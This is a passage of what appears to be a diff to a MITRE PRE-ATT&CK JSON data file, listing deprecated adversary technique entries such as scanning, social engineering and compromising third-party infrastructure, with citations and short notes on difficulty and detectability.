The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1312).\n\nInstead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1312", + "external_id": "T1312" + }, + { + "source_name": "WateringHole2014", + "description": "Pierluigi Paganini. (2014, February 15). FireEye discovered a new watering hole attack based on 0-day exploit. Retrieved March 1, 2017." + }, + { + "source_name": "FireEye Operation SnowMan", + "description": "Darien Kindlund, Xiaobo Chen, Mike Scott, Ned Moran, Dan Caselden. (2014, February 13). Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website. Retrieved March 28, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility on 3rd party sites unless target is successfully enticed to visit one.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Commonly used technique currently (e.g., [https://www.wordpress.com WordPress] sites) as precursor activity to launching attack against intended target (e.g., acquiring botnet or layers of proxies for reducing attribution possibilities).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1089", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "created": "2017-12-14T16:46:06.044Z", + "modified": 
"2020-10-26T13:42:49.342Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "type": "attack-pattern", + "x_mitre_old_attack_id": "PRE-T1111", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Commonly used technique currently (e.g., [https://www.wordpress.com WordPress] sites) as precursor activity to launching attack against intended target (e.g., acquiring botnet or layers of proxies for reducing attribution possibilities).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility on 3rd party sites unless target is successfully enticed to visit one.", + "x_mitre_detectable_by_common_defenses": "No", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1334", + "external_id": "T1334" + }, + { + "source_name": "WateringHole2014", + "description": "Pierluigi Paganini. (2014, February 15). FireEye discovered a new watering hole attack based on 0-day exploit. Retrieved March 1, 2017." + }, + { + "source_name": "FireEye Operation SnowMan", + "description": "Darien Kindlund, Xiaobo Chen, Mike Scott, Ned Moran, Dan Caselden. (2014, February 13). Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website. Retrieved March 28, 2017." + } + ], + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1334).\n\nInstead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. 
(Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)", + "name": "Compromise 3rd party infrastructure to support delivery", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--5a68c603-d7f9-4535-927e-ab56819eaa85", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise 3rd party or closed-source vulnerability/exploit information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1354).\n\nThere is usually a delay between when a vulnerability or exploit is discovered and when it is made public. An adversary may target the systems of those known to research vulnerabilities in order to gain that knowledge for use during a different attack. (Citation: TempertonDarkHotel)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1354", + "external_id": "T1354" + }, + { + "source_name": "TempertonDarkHotel", + "description": "Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. 
Retrieved March 9, 2017.", + "url": "https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1131", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Finding, attacking, and compromising a 3rd party or closed vulnerability entity is challenging, because those containing the vulnerabilities should be very aware of attacks on their environments have a heightened awareness.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The compromise of unknown vulnerabilities would provide little attack and warning against a defender, rendering it highly challenging to detect.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--4aeafdb3-eb0b-4e8e-b93f-95cd499088b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise of externally facing system", + "description": "**This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**\n\nExternally facing systems allow connections from outside the network as a normal course of operations. Externally facing systems may include, but are not limited to, websites, web portals, email, DNS, FTP, VPN concentrators, and boarder routers and firewalls. These systems could be in a demilitarized zone (DMZ) or may be within other parts of the internal environment. 
(Citation: CylanceOpCleaver) (Citation: DailyTechAntiSec)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1388", + "url": "https://attack.mitre.org/techniques/T1388" + }, + { + "description": "CYLANCE. (n.d.). Operation Cleaver. Retrieved March 6, 2017.", + "source_name": "CylanceOpCleaver" + }, + { + "description": "Jason Mick. (2011, July 12). AntiSec Exposes U.S. Soldiers' S/Ns, Passwords, Vows Attack on Monsanto. Retrieved March 9, 2017.", + "source_name": "DailyTechAntiSec" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:16:12.162Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1165", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "DMZ environments are specifically designed to be isolated because one assumes they will ultimately be compromised by the adversary.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Most DMZs are monitored but are also designed so that if they are compromised, the damage/risk is limited.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "id": "attack-pattern--7f2d3da6-7e34-44a3-9e7f-905455339726", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct active scanning", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1254).\n\nActive scanning is the act of sending transmissions to end nodes, and analyzing the responses, in order to identify information about the communications system. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1254", + "external_id": "T1254" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "This technique is an expected and voluminous activity when on the Internet. Active scanning techniques/tools typically generate benign traffic that does not require further investigation by a defender since there is no actionable defense to execute. 
The high volume of this activity makes it burdensome for any defender to chase and therefore often ignored.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Various available tools and data sources for scouting and detecting address, routing, version numbers, patch levels, protocols/services running, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1031", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--51bca707-a806-49bf-91e0-03885b0ac85c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct cost/benefit analysis", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1226).\n\nLeadership conducts a cost/benefit analysis that generates a compelling need for information gathering which triggers a Key Intelligence Toptic (KIT) or Key Intelligence Question (KIQ). For example, an adversary compares the cost of cyber intrusions with the expected benefits from increased intelligence collection on cyber adversaries. (Citation: LowenthalCh4) (Citation: KIT-Herring)", + "external_references": [ + { + "external_id": "T1226", + "url": "https://attack.mitre.org/techniques/T1226", + "source_name": "mitre-pre-attack" + }, + { + "description": "Mark M. Lowenthal. (n.d.). Ch 4: The Intelligence Process--A Macro Look; Who Does What for Whome?, Intelligence: From Secrets to Policy. Retrieved March 2, 2017.", + "source_name": "LowenthalCh4" + }, + { + "description": "Jan P. 
Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved May 19, 2017.", + "source_name": "KIT-Herring" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "phase_name": "priority-definition-planning", + "kill_chain_name": "mitre-pre-attack" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1003", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a7c620e5-cbc9-41b2-9695-418ef560f16c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct passive scanning", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1253).\n\nPassive scanning is the act of looking at existing network traffic in order to identify information about the communications system. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1253", + "external_id": "T1253" + }, + { + "source_name": "SurveyDetectionStrategies", + "description": "Jamal Raiyn. (2014). A survey of Cyber Attack Detection Strategies. Retrieved March 5, 2017." 
+ }, + { + "source_name": "CyberReconPaper", + "description": "H. P. Sanghvi and M. S. Dahiya. (2013, February). Cyber Reconnaissance: An Alarm before Cyber Attack. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Generates no network traffic that would enable detection.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Easy to do but it requires a vantage point conducive to accessing this data.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1030", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct social engineering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1279).\n\nSocial Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1279", + "external_id": "T1279" + }, + { + "source_name": "SEAttackVectors", + "description": "Mathew J. Schwartz. (2011, September 14). Social Engineering Leads APT Attack Vectors. Retrieved March 5, 2017." 
+ }, + { + "source_name": "BeachSE2003", + "description": "Gary Beach. (2003, October 1). Kevin Mitnick on Social Engineering Hackers. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No technical means to detect an adversary collecting information about a target. Any detection would be based upon strong OPSEC policy implementation.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very effective technique for the adversary that does not require any formal training and relies upon finding just one person who exhibits poor judgement.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1056", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct social engineering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1268).\n\nSocial Engineering is the practice of manipulating people in order to get them to divulge information or take an action. 
(Citation: SEAttackVectors) (Citation: BeachSE2003)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1268", + "external_id": "T1268" + }, + { + "source_name": "SEAttackVectors", + "description": "Mathew J. Schwartz. (2011, September 14). Social Engineering Leads APT Attack Vectors. Retrieved March 5, 2017." + }, + { + "source_name": "BeachSE2003", + "description": "Gary Beach. (2003, October 1). Kevin Mitnick on Social Engineering Hackers. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No technical means to detect an adversary collecting information about a target. Any detection would be based upon strong OPSEC policy implementation.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very effective technique for the adversary that does not require any formal training and relies upon finding just one person who exhibits poor judgement.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1045", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct social engineering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1249).\n\nSocial Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1249", + "external_id": "T1249" + }, + { + "source_name": "SEAttackVectors", + "description": "Mathew J. Schwartz. (2011, September 14). Social Engineering Leads APT Attack Vectors. Retrieved March 5, 2017." + }, + { + "source_name": "BeachSE2003", + "description": "Gary Beach. (2003, October 1). Kevin Mitnick on Social Engineering Hackers. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No technical means to detect an adversary collecting technical information about a target. Any detection would be based upon strong OPSEC policy implementation.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very effective technique for the adversary that does not require any formal training and relies upon finding just one person who exhibits poor judgement.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1026", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b79a1960-d0be-4b51-bb62-b27e91e1dea0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct social engineering or HUMINT operation", + "description": "**This technique has been deprecated. 
Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nSocial Engineering is the practice of manipulating people in order to get them to divulge information or take an action. Human Intelligence (HUMINT) is intelligence collected and provided by human sources. (Citation: 17millionScam) (Citation: UbiquityEmailScam)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1376", + "url": "https://attack.mitre.org/techniques/T1376" + }, + { + "description": "Chris Johnston. (2015, February 5). Company loses $17m in email scam. Retrieved March 9, 2017.", + "source_name": "17millionScam" + }, + { + "description": "Robert Hackett. (2015, August 10). Fraudsters duped this company into handing over $40 million. Retrieved March 9, 2017.", + "source_name": "UbiquityEmailScam" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:16:46.619Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1153", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Assuming an average adversary whose focus is social engineering, it is not difficult for an adversary. Assuming a HUMINT operation and specialized circumstances, the adversary difficulty becomes 1. Social engineering can be easily done remotely via email or phone. 
In contrast, HUMINT operations typically would require physical contact at some point in the process, increasing the difficulty.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Assuming an average company does not train its employees to be aware of social engineering techniques, it is not possible to detect the adversary's use unless a highly motivated or paranoid employee informs security. This assessment flips to a 1 in cases of environments where security trains employees to be vigilant or in specialized industries where competitive intelligence and business intelligence train employees to be highly aware. Most likely more complex for an adversary to detect as methods move to physical or non traditionally monitored mechanisms (such as phone calls outside of call centers). Furthermore, the content of such an interaction may be lost due to lack of collection.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--f4c5d1d9-8f0e-46f1-a9fa-f9a440926046", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Confirmation of launched compromise achieved", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nUpon successful compromise the adversary may implement methods for confirming success including communication to a command and control server, exfiltration of data, or a verifiable intended effect such as a publicly accessible resource being inaccessible or a web page being defaced. (Citation: FireEye Malware Stages) (Citation: APTNetworkTrafficAnalysis)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1383", + "url": "https://attack.mitre.org/techniques/T1383" + }, + { + "description": "carlota. (2014, November 12). Stages of a Malware Infection. 
Retrieved April 1, 2017.", + "source_name": "FireEye Malware Stages" + }, + { + "description": "Nart Villeneuve and James Bennett. (2012). Detecting APT Activity with Network Traffic Analysis. Retrieved March 9, 2017.", + "source_name": "APTNetworkTrafficAnalysis" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:17:12.000Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1160", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Certainty of the confirmation of compromise is not guaranteed unless the adversary sees communication to a command and control server, exfiltration of data, or an intended effect occur.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Current commercial tools and sensitive analytics can be used to detect communications to command and control servers or data exfiltration.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "id": "attack-pattern--a425598d-7c19-40f7-9aa3-ac20f0d5c2b2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create backup infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1339).\n\nBackup infrastructure allows an adversary to recover from environmental and system failures. It also facilitates recovery or movement to other infrastructure if the primary infrastructure is discovered or otherwise is no longer viable. 
(Citation: LUCKYCAT2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1339", + "external_id": "T1339" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Infrastructure is (typically) outside of control/visibility of defender and as such as tools are staged for specific campaigns, it will not be obvious to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "The adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], commercial storage solutions).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1116", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create custom payloads", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1345).\n\nA payload is the part of the malware which performs a malicious action. The adversary may create custom payloads when none exist with the needed capability or when targeting a specific environment. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1345", + "external_id": "T1345" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "It is likely that an adversary will create and develop payloads on inaccessible or unknown networks for OPSEC reasons.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Specialized tools exist for research, development, and testing of virus/malware payloads.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1122", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b355817c-cf63-43b4-94a4-05e9645fa910", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create implementation plan", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1232).\n\nImplementation plans specify how the goals of the strategic plan will be executed. (Citation: ChinaCollectionPlan) (Citation: OrderOfBattle)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1232", + "external_id": "T1232" + }, + { + "source_name": "ChinaCollectionPlan", + "description": "Thomas B Inglis. (1946, December 31). COLLECTION PLAN TO IMPLEMENT NATIONAL INTELLIGENCE REQUIREMENTS FOR CHINA. Retrieved March 2, 2017." + }, + { + "source_name": "OrderOfBattle", + "description": "Wikipedia contributors. (2016, November 20). Order of battle. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1009", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--eacadff4-164b-451c-bacc-7b29ebfd0c3f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create infected removable media", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1355).\n\nUse of removable media as part of the Launch phase requires an adversary to determine type, format, and content of the media and associated malware. (Citation: BadUSB)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1355", + "external_id": "T1355" + }, + { + "source_name": "BadUSB", + "description": "Security Research labs. (n.d.). BadUSB Exposure. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Several exploit repositories and tool suites exist for re-use and tailoring.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1132", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--ec739e26-d097-4804-b04a-54dd81ff11e0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create strategic plan", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
